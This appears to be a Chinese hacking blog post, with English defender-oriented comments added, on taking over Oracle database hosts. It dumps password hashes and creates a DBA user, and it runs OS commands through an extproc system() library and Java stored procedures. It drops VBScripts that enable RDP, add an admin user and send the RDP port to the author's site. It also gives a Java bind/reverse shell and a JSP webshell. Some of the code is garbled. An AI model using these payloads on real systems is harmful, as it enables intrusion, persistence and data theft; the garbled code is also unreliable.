第一部分
基本查询指令
-- Session / privilege reconnaissance. The trailing "//" and "\\" fragments are
-- the author's prose annotations, not Oracle comment syntax.
-- Defender view: V$PWFILE_USERS, V$VERSION, DBA_USERS, SYS.USER$, DBA_SYS_PRIVS,
-- DBA_ROLE_PRIVS and DBA_DIRECTORIES are dictionary views an ordinary schema
-- cannot read, so a login that can run those queries already holds DBA-level or
-- SELECT ANY DICTIONARY access; the USER_* and SESSION_PRIVS reads need nothing.
select * from V$PWFILE_USERS //查看dba用户
select * from v$version //查看oracle版本以及系统版本
select * from session_privs;// 查看当前用户拥有的权限值
select * from user_role_privs\\查询当前用户角色
select * from user_sys_privs\\查询当前用户系统权限
-- Password-hash reads. A SELECT of the password column from DBA_USERS or
-- SYS.USER$ by anything other than a known admin tool is a credential-dump
-- indicator and deserves an audit policy of its own.
select username,password from dba_users; //查看所有用户密码hash
select * from dba_sys_privs where grantee='SYSTEM';\\查系统权限
grant select any dictionary to system with admin option;\\登陆不上OEM时候需要此权限
Select name,password FROM user$ Where name='SCOTT'; //低版本查看单用户密码
Select username,decode(password,NULL,'NULL',password) password FROM dba_users; //查看用户hash
-- Persistence: a new login that is immediately granted DBA. CREATE USER and
-- GRANT DBA are the two statements to alert on in the database audit trail.
create user bob identified by iloveyou;\\建用户bob密码iloveyou
grant dba to bob;\\赋予bob DBA权限
grant execute on xmldom to bob \\赋予用户execute
-- JAVAUSERPRIV / JAVASYSPRIV are normally predefined when the JVM option is
-- installed; the author creates them only when Oracle reports the role missing.
Create ROLE "javauserpriv" NOT IDENTIFIED
Create ROLE "javasyspriv" NOT IDENTIFIED \\当提示role 'JAVASYSPRIV' does not exist使用
-- Who else already holds DBA, and which DIRECTORY objects exist (the directory
-- objects are what the UTL_FILE writes later on the page depend on).
select grantee from dba_role_privs where granted_role='DBA'; \\检查那些用户有DBA权限
select * from dba_directories;\\查看路径所在目录
第二部分,创建java,执行系统命令
no.1
-- External-procedure (extproc) command execution: a LIBRARY object pointing at
-- the C runtime is bound to a PL/SQL procedure whose external NAME is the C
-- system() function, so oracmd.exec(cmdstring) hands its argument to system().
-- Prerequisites are CREATE LIBRARY (or CREATE ANY LIBRARY) and an extproc
-- listener willing to load an arbitrary DLL. Defender controls: restrict
-- loadable libraries with EXTPROC_DLLS=ONLY:... in listener.ora, and audit
-- CREATE LIBRARY; a LIBRARY whose path is msvcrt.dll is a strong indicator.
Create or REPLACE LIBRARY exec_shell AS 'c:\windows\system32\msvcrt.dll';
/
show errors
-- Package spec: the single entry point exec(cmdstring).
Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
-- Package body: no PL/SQL logic at all; the call is routed straight to the
-- external library, so nothing inside the database validates cmdstring.
Create or REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors
上面这个没有回显的
如果不行可以使用下面这个
-- Fallback variant of the preceding extproc construct, offered by the author
-- for the case where the system32 path is refused: identical package and
-- body, but the LIBRARY path is resolved under $ORACLE_HOME instead.
-- Same detection surface: a LIBRARY object naming msvcrt.dll, and a package
-- body with IS EXTERNAL / NAME "system".
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME\msvcrt.dll';
/
show errors
-- Package spec: the single entry point exec(cmdstring).
Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
-- Package body: routes the call to the external library unchanged.
Create or REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors
执行完后
执行
-- Invokes the extproc-backed procedure with a Windows net1 command that creates
-- a local account; it runs presumably with the privileges of the extproc /
-- listener service process. Host-side signal: a user-account-creation event
-- (Windows Security 4720) whose subject is the Oracle or listener service
-- account, with a net1.exe child of the extproc process.
exec oracmd.exec ('net1 user robert iloveyou /add');
no2.
-- Java stored procedure for OS command execution. Artifacts a defender can
-- query for: a JAVA SOURCE / JAVA CLASS object named "Host" in DBA_OBJECTS, and
-- the DBMS_JAVA.grant_permission entries made further down in DBA_JAVA_POLICY.
-- Compiling Java into the schema needs CREATE PROCEDURE (or CREATE ANY
-- PROCEDURE); without the Java permission grants the spawn fails.
Create or REPLACE AND COMPILE JAVA SOURCE NAMED "Host" AS
import java.io.*;
public class Host {
// Exported to PL/SQL by host_command (defined below). Wraps the caller's
// string in "cmd.exe /y /c" or "/bin/sh -c" and spawns it.
public static void executeCommand(String command) {
try {
String[] finalCommand;
if (isWindows()) {
finalCommand = new String[4];
// Use the appropriate path for your windows version.
finalCommand[0] = "C:\\windows\\system32\\cmd.exe"; // Windows XP/2003
//finalCommand[0] = "C:\\winnt\\system32\\cmd.exe"; // Windows NT/2000
finalCommand[1] = "/y";
finalCommand[2] = "/c";
finalCommand[3] = command;
}
else {
finalCommand = new String[3];
finalCommand[0] = "/bin/sh";
finalCommand[1] = "-c";
finalCommand[2] = command;
}
final Process pr = Runtime.getRuntime().exec(finalCommand);
pr.waitFor();
// Two reader threads copy the child's stdout and stderr to System.out.
// Inside the Oracle JVM that stream presumably reaches the client only when
// the session has called DBMS_JAVA.set_output (the invoking block does so).
new Thread(new Runnable(){
public void run() {
BufferedReader br_in = null;
try {
br_in = new BufferedReader(new InputStreamReader(pr.getInputStream()));
String buff = null;
while ((buff = br_in.readLine()) != null) {
System.out.println("Process out :" + buff);
try {Thread.sleep(100); } catch(Exception e) {}
}
br_in.close();
}
catch (IOException ioe) {
System.out.println("Exception caught printing process output.");
ioe.printStackTrace();
}
finally {
try {
br_in.close();
} catch (Exception ex) {}
}
}
}).start();
new Thread(new Runnable(){
public void run() {
BufferedReader br_err = null;
try {
br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream()));
String buff = null;
while ((buff = br_err.readLine()) != null) {
System.out.println("Process err :" + buff);
try {Thread.sleep(100); } catch(Exception e) {}
}
br_err.close();
}
catch (IOException ioe) {
System.out.println("Exception caught printing process error.");
ioe.printStackTrace();
}
finally {
try {
br_err.close();
} catch (Exception ex) {}
}
}
}).start();
}
catch (Exception ex) {
System.out.println(ex.getLocalizedMessage());
}
}
// Crude OS check on the os.name property: anything whose name does not
// contain "windows" is treated as a /bin/sh host.
public static boolean isWindows() {
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
return true;
else
return false;
}
};
/
-- PL/SQL call specification binding host_command(p_command) to
-- Host.executeCommand. It is a procedure, so nothing is returned; any output
-- is only what the Java side prints to System.out. Procedures whose body is a
-- LANGUAGE JAVA call spec are easy to enumerate from DBA_SOURCE.
Create or REPLACE PROCEDURE host_command (p_command IN VARCHAR2)
AS LANGUAGE JAVA
NAME 'Host.executeCommand (java.lang.String)';
/
-- Java security-policy grants for the SYSTEM schema: file read/write/execute/
-- delete plus read/write of file descriptors. These are what allow the Java
-- code above to spawn a process and read its pipes. They persist in
-- DBA_JAVA_POLICY, which makes "who holds java.io.FilePermission or
-- RuntimePermission" a cheap and high-value hunting query.
EXEC DBMS_JAVA.grant_permission('SYSTEM', 'java.io.FilePermission', '<>', 'read ,write, execute, delete');
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
/
-- Invocation harness for host_command. DBMS_JAVA.set_output routes the Java
-- side's System.out into the DBMS_OUTPUT buffer; the result of the 'dir C:\'
-- run is then collected into l_output with get_lines (at most l_lines lines).
DECLARE
l_output DBMS_OUTPUT.chararr;
l_lines INTEGER := 1000;
BEGIN
DBMS_OUTPUT.enable(1000000);
DBMS_JAVA.set_output(1000000);
-- The command string is the only variable part of the construct; everything
-- else on this page is fixed plumbing around it.
host_command('dir C:\');
DBMS_OUTPUT.get_lines(l_output, l_lines);
END;
这个要注意两点
win下注意系统路径
linx下注意注释掉win
最后一句就是执行命令的
-- The statement the author singles out as "the one that runs the command":
-- a plain call to the Java-backed procedure with a literal command string.
host_command('dir C:\');
no3.
-- Second command-execution variant (the author's "no3"): a Java source named
-- "util" exposed through RUN_CMz / RC below. Unlike "Host" it reads the child's
-- stdout synchronously and hands back the exit code. Same hunting view:
-- DBA_OBJECTS for a JAVA SOURCE called "util", DBA_SOURCE for call specs.
create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
// Passes args straight to Runtime.exec and streams the child's stdout to
// System.out. Returns the process exit code, or -1 if anything throws.
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
// return from finally: the exit code (or -1) is what the PL/SQL caller sees.
return RC;
}
}
}
/
-- Function call spec: RUN_CMz(p_cmd) maps to util.RunThis and returns its
-- integer exit code as a NUMBER, which is what lets it be used in
-- "exec :x := run_cmz(...)" with a bind variable.
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';
/
-- Procedure wrapper around RUN_CMz that discards the exit code, for callers
-- that want a statement rather than an expression.
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;
/
-- SQL*Plus session setup for the RUN_CMz calls that follow: a bind variable to
-- receive the exit code, DBMS_OUTPUT switched on, Java output routed into it,
-- and the predefined JAVASYSPRIV role (broad Java file / runtime permissions)
-- granted to the login in use. A GRANT of JAVASYSPRIV outside a change window
-- is itself an audit-worthy event.
variable x number;
set serveroutput on;
exec dbms_java.set_output(100000);
grant javasyspriv to system;
这句注意最后这里要授权下当前登陆的用户
-- Repeat of the grant above, quoted by the author to stress that the grantee
-- must be the account actually logged in (SYSTEM in this walkthrough).
grant javasyspriv to system
最后执行
-- Runs ipconfig through the util Java class; :x receives the exit code and the
-- program output arrives via DBMS_OUTPUT. On the host this shows up as an
-- ipconfig.exe child of the database process.
exec :x:=run_cmz('ipconfig');
第二部分 操作磁盘文件
no1.
建立目录
-- Directory object on the drive root. Requires CREATE ANY DIRECTORY and is the
-- prerequisite for the UTL_FILE writes below; DBA_DIRECTORIES lists every such
-- object, so a directory pointing at C:\ (or /) is a quick thing to check for.
create or replace directory DIR as 'C:\';
此目录当然也可以是启动目录
授权
-- Object grant on the directory; the author notes it can be skipped,
-- presumably because the SYSTEM login already holds DBA.
grant read, write on directory DIR to system
这步可以不用
然后执行操作
写文件 3129_code.txt
# 鬼仔注:写文件的这段代码被nod32误报,好多人以为是被挂马了,无奈只好写进txt了
这步操作将下载我的木马到c盘并执行
-- Stages a VBScript on the database host through the DIR directory object
-- (C:\ per the create directory step) using UTL_FILE. The script text reads
-- the RDP PortNumber value and clears fDenyTSConnections, i.e. switches Remote
-- Desktop on. Artifacts: a 3389.vbs in the drive root written by the Oracle
-- process, and a registry write under ...\Control\Terminal Server from a
-- cscript child process; UTL_FILE writes always go through a DIRECTORY object.
declare
file utl_file.file_type;
begin
-- 'W' opens the file for writing; fopen fails unless the DIR object exists
-- and the session has write access to it.
file := utl_file.fopen('DIR', '3389.vbs', 'W');
utl_file.put_line(file, 'Dim OperationRegistry
Set perationRegistry=WScript.createObject("WScript.Shell")
Dim TSPort,TSState,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSPort=OperationRegistry.RegRead(TSRegPath)
TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
TSState=OperationRegistry.RegRead(TSRegPath)
If TSState=0 Then
Else
OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD"
End If');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
-- Executes the staged script through RUN_CMz. Host-side indicator: a cscript
-- process spawned by the database process with a script path in the drive root.
exec :x:=run_cmz('cscript. c:\3389.vbs');
vbs开启3389
-- Writes a second VBScript (user.vbs) via UTL_FILE. The script text is aimed at
-- creating a local user "bob" with a fixed password through the WinNT ADSI
-- provider, adding it to Administrators, then deleting the script file.
-- Host-side signals: Windows Security 4720 (account created) and 4732 (member
-- added to a local group) with the Oracle service account as subject, plus a
-- cscript child of the database process.
declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', 'user.vbs', 'W');
utl_file.put_line(file, 'set wsnetwork=CreateObject("WSCRIPT.NETWORK")
s="WinNT://"'||'&'||'wsnetwork.ComputerName
Set a=CreateObject("Scripting.FileSystemObject")
Set b=GetObject(os)
Set e=GetObject(os&"/Administrators,group")
Set d=ob.Create("user","bob")
od.SetPassword "123456abc!@#"
od.SetInfo
Set f=GetObject(os&"/bob",user)
oe.add os&"/bob"
oa.DeleteFile("user.vbs")');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
/
-- Runs the staged user.vbs through RUN_CMz (same cscript-child-of-Oracle
-- indicator as the 3389.vbs run).
exec :x:=run_cmz('cscript. c:\user.vbs');
无net添加admin用户
-- Third staged VBScript (3389p.vbs). Beyond enabling RDP it reads the RDP
-- PortNumber and sends it in an HTTP GET to the author's site
-- (blog.cnmoker.org/read3389/ro.asp), then restarts TermService via sc.
-- Defender signals: outbound HTTP from the database host to that hostname,
-- registry writes under ...\Control\Terminal Server, and TermService
-- stop/start service-control events originating from a cscript process.
declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', '3389p.vbs', 'W');
utl_file.put_line(file, '
Dim OperationRegistry
Set perationRegistry=WScript.createObject("WScript.Shell")
Dim TSPort,TSState,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSPort=OperationRegistry.RegRead(TSRegPath)
Set xPost=CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://blog.cnmoker.org/read3389/ro.asp?port=" '||'ccccc'||' TSPort,0
xPost.Send()
TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
TSState=OperationRegistry.RegRead(TSRegPath)
If TSState=0 Then
Else
OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD"
End If
set bj=wscript.createObject("wscript.shell")
obj.Run("sc config TermService start= demand")
obj.Run("sc stop TermService")
obj.Run("sc start TermService")
wscript.quit
');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
-- Runs the staged 3389p.vbs and then deletes it from the drive root. The
-- delete is the anti-forensic step; file-creation auditing on the root, or
-- the UTL_FILE write itself in the database audit trail, is what survives it.
exec :x:=run_cmz('cscript. c:\3389p.vbs');
/
exec :x:=run_cmz('del c:\3389p.vbs');
/
http://blog.cnmoker.org/read3389/read.asp
这个代码的作用是用来读取对方的3389端口并post到自己的网站数据库里
这个read.asp和ro.asp自己写吧
到此win下操作基本上是完成了
第三部分 linux的一些操作
linux的操作要用到sqlj语言
其实ISTO的kj总早就写了一些
我总结
create or replace and compile java source named bob as
import java.io.*;
import java.net.*;
public class BOB{
public static String listFolder(String path){
File f=null;
String str="";
f=new File(path);
String[] files=f.list();
if(files!=null)
for(int i=0;i str+=files[i]+"\r\n"; } return str; } public static String saveFile(String filepath,String value){ FileOutputStream fos=null; try { fos=new FileOutputStream(filepath); fos.write(value.getBytes()); return "OK"; } catch (Exception e) { return e.getMessage(); } finally{ if(fos!=null){ try {fos.close();} catch (Exception e) {} } } } public static String readFile(String pathfile,String code){ BufferedReader br=null; String value=""; try { br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile),code)); String s=null; while((s=br.readLine())!=null){ value+=s; } return value; } catch (Exception e) { return e.getMessage(); } finally{ if(br!=null){try {br.close();} catch (IOException e) {}} } } public static String execFile(String filepath,String code){ int i=0; Runtime rt=Runtime.getRuntime(); String utput=""; InputStreamReader isr = null; char[] bufferC=new char[1024]; try{ Process ps=rt.exec(filepath); isr=new InputStreamReader(ps.getInputStream(),code); while((i=isr.read(bufferC,0,bufferC.length))!=-1){ output+=new String(bufferC,0,i); } return output; }catch(Exception e){ return e.getMessage(); }finally{ if(isr!=null)try {isr.close();} catch (IOException e) {} } } public static String bindShell(int port){ ServerSocket ss=null; Socket s=null; try { ss = new ServerSocket(port); s=ss.accept(); new optShell(ss,s).start(); return "OK"; } catch (Exception e) { return e.getMessage(); } } public static String reverseShell(String host,int port){ Socket s=null; try{ s=new Socket(host,port); new optShell(null,s).start(); return "OK"; }catch(Exception e){ return e.getMessage(); } } //反弹shell的sqlj语句 public static class optShell extends Thread{ OutputStream s=null; InputStream is=null; ServerSocket ss; Socket s; public optShell(ServerSocket ss,Socket s){ this.ss=ss; this.s=s; try{ this.is=s.getInputStream(); this.os=s.getOutputStream(); }catch(Exception e){ if(os!=null)try {os.close();} catch(Exception ex) {} if(is!=null)try {is.close();} 
catch(Exception ex) {} if(s!=null)try {s.close();} catch(Exception ex) {} if(ss!=null)try {ss.close();} catch(Exception ex) {} } } public void run(){ BufferedReader br=new BufferedReader(new InputStreamReader(is)); String line=""; String cmdhelp="Command:\r\nlist \r\nsave\r\nread\r\nexec\r\nexit\r\n"; try { //os.write(cmdhelp.getBytes()); line=br.readLine(); while(!"exit".equals(line)){ if(line.length()>3){ StringBuffer sb=new StringBuffer(line.trim()); String cmd=sb.substring(0, 4); if(cmd.equals("list")){ os.write("input you path:\r\n".getBytes()); line=br.readLine(); os.write(listFolder(line).getBytes()); }else if("save".equals(cmd)){ os.write("input you filepath:\r\n".getBytes()); line=br.readLine(); os.write("input you value:\r\n".getBytes()); os.write(saveFile(line,br.readLine()).getBytes()); }else if("read".equals(cmd)){ os.write("input you filepath:\r\n".getBytes()); line=br.readLine(); os.write("input you code examle:GBK\r\n".getBytes()); os.write(readFile(line,br.readLine()).getBytes()); }else if("exec".equals(cmd)){ os.write("input you run filepath:\r\n".getBytes()); line=br.readLine(); os.write("input you code examle:GBK\r\n".getBytes()); os.write(execFile(line,br.readLine()).getBytes()); }else{ os.write(cmdhelp.getBytes()); } }else{ os.write(cmdhelp.getBytes()); } line=br.readLine(); } } catch (Exception e) { e.printStackTrace(); }finally{ if(os!=null)try {os.close();} catch(Exception e) {} if(is!=null)try {is.close();} catch(Exception e) {} if(s!=null)try {s.close();} catch(Exception e) {} if(ss!=null)try {ss.close();} catch(Exception e) {} } } } } / create or replace function BOB_LISTFOLDER(str varchar2) return varchar2 as language java name 'BOB.listFolder(java.lang.String) return java.lang.String'; / create or replace function BOB_SAVEFILE(p varchar2,v varchar2) return varchar2 as language java name 'BOB.saveFile(java.lang.String,java.lang.String) return java.lang.String'; / create or replace function BOB_READFILE(p varchar2,c varchar2) return 
varchar2 as language java name 'BOB.readFile(java.lang.String,java.lang.String) return java.lang.String'; / create or replace function BOB_EXECFILE(fp varchar2,c varchar2) return varchar2 as language java name 'BOB.execFile(java.lang.String,java.lang.String) return java.lang.String'; / create or replace function BOB_BINDSHELL(port number) return varchar2 as language java name 'BOB.bindShell(int) return java.lang.String'; / begin Dbms_Java.Grant_Permission('scott','java.io.FilePermission','<>','read,write,execute,delete'); Dbms_Java.Grant_Permission('scott','java.lang.RuntimePermission','*','writeFileDescriptor'); Dbms_Java.grant_permission('scott','java.net.SocketPermission','*:*','accept,connect,listen,resolve'); end; 这么一大段,仔细看 执行完后 引用 Select BOB_LISTFOLDER('/usr') FROM DUAL //列目录 Select BOB_EXECFILE('C:\WINDOWS\system32\cmd.exe /c dir c:\','GBK') FROM DUAL; //执行命令 Select BOB_READFILE('/tmp/1.txt','GBK') FROM DUAL; //读文件 Select BOB_SAVEFILE('/tmp/1.jsp','<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>') FROM DUAL; 写jsp一句话 可查看我的上一篇BLOG 引用 Select BOB_BINDSHELL(20000) FROM DUAL //开启端口2000然后你telnet ip 2000上去 其中本来还有reserver shell的 我还没来的及测试 我自己是更中意反弹shell的 特别是linux 好操作的多 再说有时候linux是nat出来的 反弹就去了许多麻烦 第四部分 技巧 一句话读取3389端口 引用 exec :x:=run_cmz('REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber'); 一句话开3389 只合适win 2k3 引用 exec :x:=run_cmz('REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'); 删除pcanywhere导致的终端登陆错误 引用 exec :x:=run_cmz('reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f'); 感谢kj,和linx的文章. 最后说下,关于web injection部分 有时间在整理吧 不妥之处,请指教 QQ:1972097 over